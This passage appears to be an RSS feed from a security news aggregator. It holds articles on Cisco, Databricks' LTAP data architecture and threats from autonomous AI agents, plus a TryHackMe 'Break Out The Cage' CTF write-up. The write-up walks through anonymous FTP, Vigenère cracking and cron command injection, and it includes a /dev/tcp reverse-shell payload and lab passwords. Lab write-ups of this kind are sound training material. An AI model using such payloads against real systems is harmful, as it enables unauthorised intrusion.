<p>Da Cisco AgenticOps, AI Canvas, Live Protect und Cisco IQ in den Mainstream bringt, verschiebt sich die Rolle der IT von der manuellen Bedienung einzelner Werkzeuge hin zur Überwachung von KI-Agenten. Dieser Wandel erfordert neue Kompetenzen in den Bereichen Prompt-Design, Richtlinienmodellierung, Risikobewertung und Governance. Insbesondere, weil Agenten immer mehr Änderungen vorschlagen und testen, bevor Menschen überhaupt auf „Genehmigen“ klicken.</p>



<p>Für Kunden bedeutet dies auch einen Perspektivwechsel: Cisco sollte künftig weniger als Sammlung einzelner Best-of-Breed-Produkte betrachtet werden, sondern vielmehr als integrierte Plattform.</p>



<p>Je mehr der Cisco-Umgebung mit Cloud Control verknüpft ist, desto mehr Nutzen sollten Kunden aus gemeinsamer Telemetrie, einheitlichen Workflows, integrierter Sicherheit und domänenübergreifender Automatisierung ziehen – insbesondere in Bereichen wie Secure Networking und Multicloud-Betrieb.</p>



<p>Umgekehrt benötigen Kunden, deren Umgebungen weiterhin stark heterogen sind, klare Integrationsstrategien und Governance-Modelle, um sicherzustellen, dass Tools von Drittanbietern sicher in das System eingebunden werden können.</p>



<p>Der vielleicht größte Nutzen des neuen Cisco liegt in der Reduzierung von Komplexität – einem der größten Schmerzpunkte vieler Unternehmenskunden. Wenn das Unternehmen diese Vision umsetzen kann, werden Kunden möglicherweise feststellen, dass Cisco nicht nur auf positive Weise nicht wiederzuerkennen ist. Sondern auch einfacher zu kaufen, zu implementieren und zu betreiben ist als jemals zuvor. (mb)</p>



<p><em>Dieser Artikel basiert auf einem </em><a href="https://www.networkworld.com/article/4184554/how-jeetu-patel-made-cisco-unrecognizable.html"><em>Beitrag</em></a><em> der Network World.</em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Databricks pitches LTAP as a new foundation for agentic applications]]></title>
<description><![CDATA[As enterprises rush to build AI agents that can reason over business data and take action, Databricks argues that the long-standing practice of separating operational and analytical data systems is turning into a liability.



That separation, the cloud-based data warehouse provider says, is beco...]]></description>
<link>https://tsecurity.de/de/3601890/ai-nachrichten/databricks-pitches-ltap-as-a-new-foundation-for-agentic-applications/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3601890/ai-nachrichten/databricks-pitches-ltap-as-a-new-foundation-for-agentic-applications/</guid>
<pubDate>Tue, 16 Jun 2026 15:04:15 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>As enterprises rush to build AI agents that can reason over business data and take action, Databricks argues that the long-standing practice of separating operational and analytical data systems is turning into a liability.</p>



<p>That separation, the cloud-based data warehouse provider says, is becoming increasingly strained as AI agents require simultaneous access to live operational data and historical context to make decisions and take actions in real time, unlike humans, who traditionally can work with data that is minutes or hours old.</p>



<p>At its annual Data + AI Summit, the data warehouse provider introduced Lake Transactional and Analytical Processing (LTAP), a new architecture designed to unify transactional and analytical data on a single storage layer.</p>



<p>The new approach, according to Databricks, differs from traditional <a href="https://www.infoworld.com/article/2334535/what-is-oltp-the-backbone-of-ecommerce.html">online transaction processing (OLTP)</a> and <a href="https://www.infoworld.com/article/2334471/what-is-olap-analytical-databases.html">online analytical processing (OLAP)</a> architectures, which typically store operational and analytical data in separate systems.</p>



<p>Traditionally, OLTP databases are optimized for running day-to-day business operations such as order processing, payments, and inventory updates, while OLAP systems are designed for large-scale analytical queries and reporting.</p>



<p>As a result, enterprises often need to rely on <a href="https://www.infoworld.com/article/3487711/the-definitive-guide-to-data-pipelines.html">ETL pipelines</a>, data replication, and separate infrastructure to move information between the two environments.</p>



<p>LTAP, Databricks said, seeks to eliminate the reliance on ETL pipelines, replicated databases or separate data copies by storing data once in a shared <a href="https://www.infoworld.com/article/2334907/review-databricks-lakehouse-platform.html">lakehouse</a> layer while allowing dedicated compute engines to handle transactional and analytical workloads independently.</p>



<p>This approach, the company argued, provides AI-driven agents and applications access to both live operational data and historical analytical context without requiring data movement or duplicate copies.</p>



<h2 class="wp-block-heading">Developer simplicity in the agentic era</h2>



<p>Analysts, too, agree with Databricks’ contention that AI agents place new demands on enterprise data architectures.</p>



<p>“Agents don’t behave like people, or even like the apps we built for people. They read for context, loop, try things, then write something back, thousands of times over in ways you can’t fully predict. At that volume, the constant bouncing between production and analytics systems starts becoming the bottleneck. The pressure to collapse that gap is real, and LTAP is one way to approach it,” said <a href="https://moorinsightsstrategy.com/team/mike-leone/" target="_blank" rel="noreferrer noopener">Michael Leone</a>, principal analyst at Moor Insights and Strategy.</p>



<p><a href="https://www.linkedin.com/in/bhupendrachopra/" target="_blank" rel="noreferrer noopener">Bhupendra Chopra</a>, cofounder and CRO at IT consulting firm Kanerika, pointed out that an autonomous agent’s data access pattern makes the traditional architectures brittle: “We’re seeing this directly with clients deploying multi-agent systems, the pipeline layer becomes the ceiling almost immediately as an agent runs hundreds of times per task.”</p>



<p>The analysts also pointed out that the ability to collapse the gap between OLAP and OLTP is likely to help developers design more robust AI agents or applications that enterprises are currently targeting to deploy.</p>



<p>“The most interesting workflow or application patterns are real-time, context-aware applications that combine transactions, analytics, and AI in one flow,” said <a href="https://www.linkedin.com/in/slwalter/" target="_blank" rel="noreferrer noopener">Stephanie Walter</a>, practice leader of AI stack at HyperFRAME Research.</p>



<p>“Examples include AI agents that update customer workflows while seeing historical account context and fraud systems that act on live transactions and long-term behavioral patterns,” Walter added.</p>



<p>Designing such applications today, however, according to Leone, would require developers to pull together data from transactional systems, data warehouses, vector databases, and other sources through custom integrations, creating significant engineering complexity and maintenance overhead.</p>



<h2 class="wp-block-heading">Operational simplicity and governance gains for CIOs</h2>



<p>For CIOs,  LTAP’s ability to reduce that engineering complexity, according to <a href="https://www.hfsresearch.com/team/ashish-chaturvedi/" target="_blank" rel="noreferrer noopener">Ashish Chaturvedi</a>, leader of executive research at HFS Research, will result in operational simplicity as well as cost savings.</p>



<p>“Most prominent advantage would be fewer data pipelines and everything that cascades from eliminating them. Most enterprises don’t realize how much of their data engineering budget is pure plumbing maintenance,” Chaturvedi said.</p>



<p>Kanerika’s Chopra pointed out that a substantial portion of data engineering capacity in mid-to-large enterprises today is consumed by maintaining synchronization between transactional and analytical systems.</p>



<p>The implications, however, Chaturvedi noted, are not limited to developer productivity, architectural simplicity, or cost savings: “The strategic prize is simplified governance. When you have one copy of data under one governance model instead of the same data scattered across operational stores, replicas, warehouses, and vector databases, you’ve solved the governance fragmentation problem.”</p>



<p>That simplification, according to Chopra, will matter operationally for enterprises deploying multiple AI agents, as these workflows can amplify governance gaps at a speed and scale that no human workflow ever did.</p>



<h2 class="wp-block-heading">LTAP versus HTAP</h2>



<p>Despite all its benefits, though, LTAP isn’t the first effort to unify operational and analytical workloads under a single architecture and for years.</p>



<p>The industry has pursued a similar goal through <a href="https://www.infoworld.com/article/2260125/how-in-memory-computing-drives-digital-transformation-with-htap.html">Hybrid Transactional and Analytical Processing (HTAP)</a> architecture, which sought to combine operational and analytical workloads on tightly coupled infrastructure to serve both workload types from the same system.</p>



<p>LTAP, in contrast, separates storage from compute, allowing different engines to access a common data layer while remaining independently scalable, Databricks said.</p>



<p>That separation of compute engines is why analysts think that LTAP might be a better bet than HTAP.</p>



<p>“HTAP never took off because asking one tightly bound system to be great at transactions and great at analytics usually left it mediocre at both, so customers ended up paying a premium for that compromise,” Leone said.</p>



<p>“I think separating storage from compute is the right instinct, and it’s the same move that made the modern cloud data world work in the first place. It matters because the thing that sank HTAP was one workload starving the other, and giving each side its own dedicated engine is exactly how you keep that from happening,” Leone added.</p>



<p>Another reason for HTAP’s failure, according to <a href="https://isg-one.com/about-us/people/david-menninger">David Menninger</a>, executive director of software research at ISG, was its requirement for enterprises to replace existing data platforms with a new architecture.</p>



<p>LTAP, by contrast, builds on the now-common practice of separating compute and storage, making the addition of an operational layer less of an architectural transformation and potentially lowering the barrier to adoption, Menninger added.</p>



<h2 class="wp-block-heading">Not yet the default architecture for AI agents</h2>



<p>However, despite the enthusiasm around LTAP, analysts warned CIOs against viewing this as the inevitable successor to existing data architectures.</p>



<p>“CIOs will still need to choose their data architecture based on latency, reliability, ecosystem fit, cost, compliance, and developer experience,” Walter said.</p>



<p>Echoing Walter, Chaturvedi pointed out that for LTAP to become the de facto standard for the industry, Databricks will need more than architectural elegance: “The architecture looks sound on paper. The proof will be in the commit-to-query latency numbers under real load.”</p>



<p>LTAP, Databricks said, is expected to be released soon as part of <a href="https://www.infoworld.com/article/4007541/databricks-data-ai-summit-2025-five-takeaways-for-data-professionals-developers.html">Lakebase,</a> without providing any specific timelines.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Hong Kong watchdog launches data privacy academy to develop top talent in sector]]></title>
<description><![CDATA[Hong Kong’s privacy watchdog has launched a data privacy academy as part of efforts to align with the national strategy of developing the city into an international high-calibre talent hub.
Announcing the news at the 30th Anniversary Privacy Protection Summit on Tuesday, Privacy Commissioner for ...]]></description>
<link>https://tsecurity.de/de/3600995/it-security-nachrichten/hong-kong-watchdog-launches-data-privacy-academy-to-develop-top-talent-in-sector/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3600995/it-security-nachrichten/hong-kong-watchdog-launches-data-privacy-academy-to-develop-top-talent-in-sector/</guid>
<pubDate>Tue, 16 Jun 2026 09:53:32 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Hong Kong’s privacy watchdog has launched a data privacy academy as part of efforts to align with the national strategy of developing the city into an international high-calibre talent hub.
Announcing the news at the 30th Anniversary Privacy Protection Summit on Tuesday, Privacy Commissioner for Personal Data Ada Chung Lai-ling said the office would also strive to implement and support the city’s first five-year plan.
“As an educator and reformer, I am delighted to announce the launch of the...]]></content:encoded>
</item>
<item>
<title><![CDATA[TryHackMe — Break Out The Cage | Full Write-Up]]></title>
<description><![CDATA[Platform: TryHackMeRoom: Break Out The Cage Difficulty: Easy Author: Shikhali JamalzadeGitHub: github.com/alisalive LinkedIn: linkedin.com/in/camalzads“Put… the bunny… back… in the box.” — Con AirOverviewBreak Out The Cage is an Easy-rated TryHackMe room themed around the one and only Nicolas Cag...]]></description>
<link>https://tsecurity.de/de/3600908/hacking/tryhackme-break-out-the-cage-full-write-up/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3600908/hacking/tryhackme-break-out-the-cage-full-write-up/</guid>
<pubDate>Tue, 16 Jun 2026 09:09:25 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*rUPRnVNHMjz8v3ThNIdsrg.png"></figure><h4><strong>Platform:</strong> TryHackMe<br><strong>Room:</strong> <a href="https://tryhackme.com/room/breakoutthecage1">Break Out The Cage</a> <br><strong>Difficulty:</strong> Easy <br><strong>Author:</strong> <a href="https://medium.com/u/20557ba7487d">Shikhali Jamalzade</a><br><strong>GitHub:</strong> <a href="http://github.com/alisalive">github.com/alisalive</a> <br><strong>LinkedIn:</strong> <a href="http://linkedin.com/in/camalzads">linkedin.com/in/camalzads</a></h4><blockquote>“Put… the bunny… back… in the box.” — Con Air</blockquote><h3>Overview</h3><p>Break Out The Cage is an Easy-rated TryHackMe room themed around the one and only Nicolas Cage. Despite the lighthearted theme, the room chains together several real-world attack techniques: anonymous FTP access, multi-layer cryptography, SSH lateral movement, cron-based command injection, and classical cipher analysis for privilege escalation.</p><p>This writeup documents the complete attack chain from initial recon to root.</p><h3>Reconnaissance</h3><h3>Port Scanning</h3><p>Starting with a full-port Nmap scan to get a complete picture of the attack surface:</p><pre>nmap 10.48.182.244 -p- --open -sVC -Pn -n</pre><p><strong>Results:</strong></p><pre>PORT   STATE SERVICE VERSION<br>21/tcp open  ftp     vsftpd 3.0.3<br>| ftp-anon: Anonymous FTP login allowed<br>|_-rw-r--r-- 1 0 0 396 May 25 2020 dad_tasks<br>22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3<br>80/tcp open  http    Apache httpd 2.4.29 (Ubuntu)</pre><p>Three open ports. The most interesting finding right away: <strong>anonymous FTP login is allowed</strong>, and there’s already a file sitting there — dad_tasks.</p><h3>Web Enumeration</h3><p>Port 80 hosts a Nicolas Cage personal website. Poking around the source, it’s a static HTML page — no login forms, no dynamic content. The real entry point is FTP.</p><h3>Initial Access</h3><h3>Step 1 — Anonymous FTP &amp; Exfiltration</h3><p>Connecting to FTP without credentials:</p><pre>ftp 10.48.182.244<br># Username: anonymous<br># Password: (blank)</pre><pre>ftp&gt; get dad_tasks</pre><p>The file content:</p><pre>UWFwdyBFZWtjbCAtIFB2ciBSTUtQLi4uWFpXIFZXVVIuLi4gVFRJIFhFRi4uLiBMQUEgWlJH<br>UVJPIS...</pre><p>Classic Base64. Decoding immediately:</p><pre>cat dad_tasks | base64 -d</pre><p><strong>Output:</strong></p><pre>Qapw Eekcl - Pvr RMKP...XZW VWUR... TTI XEF... LAA ZRGQRO!!!!<br>Sfw. Kajnmb xsi owuowge<br>Faz. Tml fkfr qgseik ag oqeibx<br>Eljwx. Xil bqi aiklbywqe<br>Rsfv. Zwel vvm imel sumebt lqwdsfk<br>Yejr. Tqenl Vsw svnt "urqsjetpwbn einyjamu" wf.<br>Iz glww A ykftef.... Qjhsvbouuoexcmvwkwwatfllxughhbbcmydizwlkbsidiuscwl</pre><p>Still encrypted. The structure looks like a Vigenere cipher.</p><h3>Step 2 — Vigenere Cipher Decryption</h3><p>The first line Qapw Eekcl immediately looks like Nicholas Cage — same character count, same word lengths. Using this as a known-plaintext attack on <a href="https://dcode.fr/vigenere-cipher">dcode.fr/vigenere-cipher</a>:</p><ul><li><strong>Method:</strong> Knowing a plaintext word</li><li><strong>Ciphertext fragment:</strong> Qapw Eekcl</li><li><strong>Known plaintext:</strong> Nicholas Cage</li></ul><p><strong>Key recovered: </strong><strong>NAMELESSSTWO</strong></p><p>Full decrypted text:</p><pre>Dads Tasks - The RAGE...THE CAGE... THE MAN... THE LEGEND!!!!<br>One. Revamp the website<br>Two. Put more quotes in script<br>Three. Buy bee pesticide<br>Four. Help him with acting lessons<br>Five. Teach Dad what "information security" is.</pre><pre>In case I forget....<br>Mydadisghostrideraintthatcoolnocausehesonfirejokes</pre><p>The last line is clearly a password. The website mentioned his son <strong>Weston</strong> set it up — that gives us a username.</p><h3>Step 3 — SSH as weston</h3><pre>ssh weston@10.48.182.244<br># Password: Mydadisghostrideraintthatcoolnocausehesonfirejokes</pre><p>We’re in.</p><h3>Privilege Escalation — weston → cage</h3><h3>Enumeration</h3><p>Running sudo -l:</p><pre>User weston may run the following commands on national-treasure:<br>    (root) /usr/bin/bees</pre><p>/usr/bin/bees just runs wall "AHHHHHHH THEEEEE BEEEEESSSS!!" — not directly exploitable.</p><p>Checking group memberships:</p><pre>id<br># uid=1001(weston) gid=1001(weston) groups=1001(weston),1000(cage)</pre><p>Weston is in the cage group. Running LinPEAS reveals a critical finding:</p><pre>Group cage:<br>/opt/.dads_scripts/.files/.quotes    (-rwxrw----)</pre><p>The .quotes file is group-writable. Investigating further:</p><pre>cat /opt/.dads_scripts/spread_the_quotes.py</pre><pre>#!/usr/bin/env python<br>import os<br>import random<br>lines = open("/opt/.dads_scripts/.files/.quotes").read().splitlines()<br>quote = random.choice(lines)<br>os.system("wall " + quote)</pre><p>This script reads a random line from .quotes and passes it directly to os.system("wall " + quote). That's <strong>command injection</strong> — whatever is in .quotes gets executed as a shell command.</p><p>Watching the broadcast messages confirms the script runs every 3 minutes via a cron job under the cage user.</p><h3>Exploitation — Cron-based Command Injection</h3><p>Setting up a listener on the attack machine:</p><pre>nc -lvnp 4445</pre><p>Replacing the contents of .quotes with a single reverse shell payload so random.choice has no other option:</p><pre>echo 'x; bash -c "bash -i &gt;&amp; /dev/tcp/192.168.144.75/4445 0&gt;&amp;1"; #' &gt; /opt/.dads_scripts/.files/.quotes</pre><p>When the cron job fires, os.system executes:</p><pre>wall x; bash -c "bash -i &gt;&amp; /dev/tcp/192.168.144.75/4445 0&gt;&amp;1"; #</pre><p><strong>Shell received as </strong><strong>cage.</strong></p><pre>cage@national-treasure:~$</pre><h3>Flag 1</h3><pre>cat ~/Super_Duper_Checklist</pre><pre>5 - Figure out why Weston has this etched into his desk: THM{M37AL_0R_P3N_T35T1NG}</pre><h3>Privilege Escalation — cage → root</h3><h3>Email Analysis</h3><p>Enumerating cage’s home directory reveals an email_backup folder with three emails. email_3 stands out:</p><pre>From - Cage@nationaltreasure.com<br>To - Weston@nationaltreasure.com</pre><pre>Hey Son,<br>Sean left a note on his desk with some really strange writing on it.<br>Could you look into it please? The note said:</pre><pre>haiinspsyanileph</pre><p>The email also mentions Sean is “obsessed with my face lately. He came in wearing a mask of my face.”</p><p><strong>Key hint: </strong><strong>FACE</strong></p><h3>Vigenere Decryption — Round 2</h3><p>Back to <a href="https://dcode.fr/vigenere-cipher">dcode.fr/vigenere-cipher</a>:</p><ul><li><strong>Ciphertext:</strong> haiinspsyanileph</li><li><strong>Key:</strong> FACE</li></ul><p><strong>Plaintext: </strong><strong>cageisnotalegend</strong></p><h3>Root Access</h3><pre>su root<br># Password: cageisnotalegend</pre><pre>root@national-treasure:~#</pre><h3>Flag 2</h3><pre>cat ~/email_backup/email_2</pre><pre>To ascend yourself to this level please use this code:</pre><pre>THM{8R1NG_D0WN_7H3_C493_L0N9_L1V3_M3}</pre><h3>Attack Chain Summary</h3><pre>[Recon] nmap -p- -sVC<br>         └─► FTP anonymous login → dad_tasks (Base64)</pre><pre>[Crypto] Base64 decode → Vigenere (key: NAMELESSSTWO)<br>         └─► Password: Mydadisghostrideraintthatcoolnocausehesonfirejokes</pre><pre>[Access] SSH → weston@target</pre><pre>[PrivEsc #1] weston ∈ cage group<br>             └─► /opt/.dads_scripts/.files/.quotes (group-writable)<br>             └─► spread_the_quotes.py → os.system() → Command Injection<br>             └─► Cron job (every 3 min) → Reverse shell as cage</pre><pre>[Flag 1] THM{M37AL_0R_P3N_T35T1NG}</pre><pre>[PrivEsc #2] email_backup/email_3 → haiinspsyanileph<br>             └─► Vigenere (key: FACE) → cageisnotalegend<br>             └─► su root</pre><pre>[Flag 2] THM{8R1NG_D0WN_7H3_C493_L0N9_L1V3_M3}</pre><h3>Key Takeaways</h3><p><strong>Anonymous FTP</strong> is still a common misconfiguration that leaks sensitive data. Never leave files with credentials or hints accessible without authentication.</p><p><strong>Multi-layer encoding</strong> (Base64 + Vigenere) provides a false sense of security. Known-plaintext attacks trivially break Vigenere when the attacker can guess even a fragment of the plaintext.</p><p><strong>os.system() with unsanitized input</strong> is one of the most dangerous patterns in Python scripting. If user-controlled data (even indirectly, through a writable file) reaches os.system(), it's game over. Use subprocess with argument lists instead.</p><p><strong>Cron jobs running as privileged users</strong> that touch world/group-writable files are a classic privilege escalation vector. Always audit cron job file permissions during a Linux engagement.</p><p><strong>Hints hidden in plaintext</strong> (the “face” reference in the email) are a common CTF mechanic, but they mirror real-world situations where developers leave cryptographic keys in comments, emails, or documentation.</p><h3>Tools Used</h3><p>Tool Purpose Nmap Port scanning &amp; service detection ftp Anonymous FTP access base64 Decoding dad_tasks dcode.fr Vigenere cipher analysis LinPEAS Linux privilege escalation enumeration nc (netcat) Reverse shell listener ssh Remote access</p><p><em>Author: Shikhali Jamalzade</em> <em>GitHub: </em><a href="https://github.com/alisalive"><em>github.com/alisalive</em></a> <em>LinkedIn: </em><a href="https://linkedin.com/in/camalzads"><em>linkedin.com/in/camalzads</em></a></p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=6de0702d0e01" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/tryhackme-break-out-the-cage-full-write-up-6de0702d0e01">TryHackMe — Break Out The Cage | Full Write-Up</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Autonome KI-Agenten: Strategien für die neue Bedrohungslage]]></title>
<description><![CDATA[width="1024" height="635" sizes="auto, (max-width: 1024px) 100vw, 1024px">Angreifer nutzen vermehrt keine eigene Schadsoftware, sondern missbrauchen kompromittierte Zugangsdaten, um interne KI-Assistenten nach sensiblen Informationen zu befragen. Der eigene Bot wird zum Aggressor. Summit Art Crea...]]></description>
<link>https://tsecurity.de/de/3600603/it-security-nachrichten/autonome-ki-agenten-strategien-fuer-die-neue-bedrohungslage/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3600603/it-security-nachrichten/autonome-ki-agenten-strategien-fuer-die-neue-bedrohungslage/</guid>
<pubDate>Tue, 16 Jun 2026 06:05:12 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large is-resized"> width="1024" height="635" sizes="auto, (max-width: 1024px) 100vw, 1024px"&gt;<figcaption class="wp-element-caption">Angreifer nutzen vermehrt keine eigene Schadsoftware, sondern missbrauchen kompromittierte Zugangsdaten, um interne KI-Assistenten nach sensiblen Informationen zu befragen. Der eigene Bot wird zum Aggressor. </figcaption></figure><p class="imageCredit">Summit Art Creations/ Shutterstock</p></div>



<p>Die technologische Entwicklung hat eine Stufe erreicht, in der künstliche Intelligenz (KI) eigenständig Prozesse steuert. Sogenannte autonome <a href="https://www.computerwoche.de/article/4150608/wie-ki-agenten-observable-werden.html" target="_blank">Agenten</a> greifen auf Datenbanken zu, interagieren mit Schnittstellen und führen Transaktionen ohne menschliches Eingreifen aus. Mit dieser Handlungsfähigkeit wächst jedoch das Schadenspotenzial bei Cyberangriffen massiv.</p>



<p>Eine Analyse von Gesprächen mit mehr als 3.000 Unternehmensentscheidern in Europa zeigt, dass drei von vier Projekten im Bereich der agentenbasierten KI bereits in der Pilotphase erhebliche Sicherheitslücken aufweisen. Die Ursache liegt dabei selten in technischem Versagen, sondern in einer mangelhaften strategischen Einbettung auf Führungsebene. CISOs stehen vor der Aufgabe, die bisherige Sicherheitsarchitektur grundlegend zu erweitern, um die neue Angriffsfläche zu beherrschen.</p>



<h2 class="wp-block-heading">Agentic Endpoint: Die neue, unsichtbare Angriffsfläche</h2>



<p>Derzeit vollzieht sich ein Paradigmenwechsel in der IT-Infrastruktur, der die herkömmliche Definition von Endpunkten sprengt. Bisher lag der Fokus der <a href="https://www.computerwoche.de/article/4161415/cybersecurity-muss-zukunftig-in-echtzeit-erfolgen.html" target="_blank">Cybersicherheit</a> darauf, menschlicher Nutzer und deren Endgeräte vor bösartigen Attacken zu schützen. Agentenbasierte KI-Tools verändern dieses Spielfeld, da sie als „ultimative Insider“ agieren. Sie besitzen Zugriff auf sensible Datenbestände, verfügen oft über weitreichende Berechtigungen und führen Aktionen in Unternehmensanwendungen autonom aus.</p>



<p>Dadurch wird eine neue kritische Ebene in der Sicherheitsarchitektur etabliert: der sogenannte „Agentic Endpoint”. Damit sind nicht physische Geräte gemeint, sondern die KI-Agenten selbst, die am Ende der Prozesskette wie eigenständige Identitäten agieren und somit eine neue, oft ungeschützte Angriffsfläche direkt auf den bestehenden Systemen schaffen.</p>



<p>Im Gegensatz zu traditionellen Endpunkten wie zum Beispiel Laptops entziehen sich diese KI-Agenten oft der Sichtbarkeit klassischer Kontrollmechanismen. Sie nutzen Erweiterungen, Plugins und Skripte, die häufig außerhalb der zentralen IT-Verwaltung operieren.</p>



<p>Bedrohungsakteure haben dies erkannt und passen ihre Strategien entsprechend an. Angriffe werden nicht mehr primär durch auffällige Malware eingeleitet, sondern durch das Kapern legitimer Automatisierungsprozesse. Durch manipulierte Agenten-Identitäten oder entwendete API-Tokens werden Werkzeuge, die zur Effizienzsteigerung gedacht waren, gegen die Organisation selbst gewendet.</p>



<h2 class="wp-block-heading">KI als Turbo für Bedrohungsakteure</h2>



<p>Die Bedrohungslage verschärft sich zunehmend. KI fungiert inzwischen für Angreifer als technologischer Beschleuniger, der den gesamten Angriffslebenszyklus komprimiert. Die Zeitspanne zwischen der Entdeckung einer Schwachstelle und deren Ausnutzung schrumpft rapide. Im Jahr 2025 wurde eine Vervierfachung der Exfiltrationsgeschwindigkeit bei den schnellsten Angriffen verzeichnet.</p>



<p>Besonders kritisch ist auch der Trend zum „Living off the AI Land“ (LOTAIL). Angreifer nutzen dabei keine eigene Schadsoftware, sondern missbrauchen kompromittierte Zugangsdaten, um interne KI-Assistenten nach sensiblen Informationen zu befragen. Ein KI-Assistent, der für das Finanz-Reporting trainiert wurde, kann so unfreiwillig zum Informanten für Externe werden, die auf Geschäftsgeheimnisse zugreifen wollen. Ist ein Agent berechtigt, Daten zu lesen und E-Mails zu versenden, lassen sich durch einfache textbasierte Befehle (Prompts) Transaktionen auslösen, ohne dass eine einzige Zeile Schadcode in das System eingeschleust werden muss.</p>



<h2 class="wp-block-heading">Die strategische Antwort: Plattform-Ansatz statt Patchwork</h2>



<p>Um der Komplexität zu begegnen, sollte die Sicherheitsstrategie grundlegend neu ausgerichtet werden. In der Vergangenheit kauften Betriebe für neue Herausforderungen oft punktuelle Lösungen. Dieser fragmentierte Ansatz führt jedoch zwangsläufig zu Sicherheitslücken. Isolierte Werkzeuge für Sprachmodelle, Identitäten oder Cloud-Umgebungen schaffen blinde Flecken, die von autonomen Agenten in Millisekunden ausgenutzt werden können.</p>



<p>Die technologische Antwort darauf ist der Plattform-Ansatz. Eine nativ integrierte Sicherheitsarchitektur ermöglicht es der Führungsebene, die Kontrolle über das gesamte KI-Ökosystem zurückzugewinnen. Das Ziel ist vollständige Sichtbarkeit: Jedes Modell, jede Applikation und jeder Agent muss in Echtzeit überwachbar sein. Nur durch die Kenntnis aller aktiven Agenten und der von ihnen genutzten Plugins lassen sich Risiken effektiv bewerten.</p>



<p>Zudem müssen KI-Agenten sicherheitstechnisch wie menschliche Identitäten behandelt werden. Da sie autonom handeln, ist die Anwendung von Privileged Access Management (PAM) und Zero-Trust-Prinzipien unverzichtbar. Jede Aktion eines Agenten muss kontinuierlich verifiziert werden. Es wäre undenkbar, einer neuen Hilfskraft am ersten Tag uneingeschränkten Zugriff auf sämtliche Finanzkonten zu gewähren – dennoch geschieht dies bei KI-Agenten oft durch übermäßige Privilegierung. Erst durch die Bündelung auf einer zentralen Sicherheitsplattform gewinnt die IT-Leitung die notwendige Transparenz zurück, um die Einhaltung von Sicherheitsvorgaben für alle autonomen Agenten in Echtzeit zu überwachen und lückenlos zu protokollieren. </p>



<h2 class="wp-block-heading">Ein Blueprint für die Governance auf Vorstandsebene</h2>



<p>Technologie allein stellt jedoch nur einen Teil der Lösung dar. Es bedarf einer Governance-Struktur, die Sicherheit als integralen Bestandteil der Geschäftsstrategie begreift. Governance-Lücken gelten heute als Hauptgrund für das Scheitern von KI-Projekten, wenn diese als isolierte IT-Experimente gestartet werden, ohne dass Risikomanagement und Rechtsabteilung eingebunden sind.</p>



<p>Ein bereichsübergreifendes „Agentic Governance Council“ zu etablieren ist daher ein notwendiger strategischer Schritt. Dieses Gremium sollte die Verantwortung tragen und die strategische Führung übernehmen. Es gilt sicherzustellen, dass Projekte nicht durch Outcome Drift – das schleichende Abweichen von den ursprünglichen Zielen – ihren Fokus verlieren. Eine zielführende Strategie sieht vor, Systeme mit KI-Agenten von den gewünschten Geschäftsergebnissen her rückwärts zu entwickeln (Reverse Engineering). Bevor ein Agent produktiv eingesetzt wird, müssen seine Handlungsspielräume und Risikoparameter verbindlich definiert sein.</p>



<p>Ergänzend muss eine Kultur gefördert werden, die proaktive Sicherheitsüberprüfungen priorisiert. Organisationen, die in Simulationen und Red-Teaming für ihre KI-Systeme investieren, weisen eine signifikant höhere Resilienz auf. Es liegt in der Verantwortung der Unternehmensführung, die notwendigen Ressourcen für diese Art der kontrollierten Konfrontation bereitzustellen.</p>



<h2 class="wp-block-heading">Souveränität in der autonomen Zukunft</h2>



<p>Der Aufstieg der agentenbasierten KI markiert den Beginn einer neuen Phase der digitalen Transformation. Die Grenzen zwischen menschlicher Intention und maschineller Ausführung verschwimmen zunehmend. Für Entscheidungsträger bedeutet dies, dass die Priorität nicht mehr allein darauf liegt, Innovation zu ermöglichen, sondern strategische Reibungsverluste durch eine robuste Governance zu minimieren.</p>



<p>Der Übergang von einer lückenhaften Patchwork-Sicherheit zu einer konsolidierten Plattformstrategie ist die Voraussetzung, um die Produktivitätsvorteile der KI-Revolution nachhaltig zu nutzen. So wird die Organisation vor existenziellen Risiken geschützt, die in einer Welt autonomer Systeme ohne klare Leitplanken unkalkulierbar sind. Die Entscheidung über die Zukunftsfähigkeit der Sicherheitsarchitektur bestimmt maßgeblich, ob ein Unternehmen die technologische Transformation proaktiv steuert oder zum Getriebenen der Entwicklung wird. (jd)</p>



<p></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[AWS Weekly Roundup: AWS FinOps Agent in preview, Gemma 4 on Bedrock, Kiro Pro Max, and more (June 15, 2026)]]></title>
<description><![CDATA[This week, New York City is hosting AWS Summit, bringing together builders, customers, and AWS teams for a full day of announcements, demos, and technical sessions at the Javits Center. I wrote blog posts for some of the Summit launches, so I am excited to see them go live this week. I just won’t...]]></description>
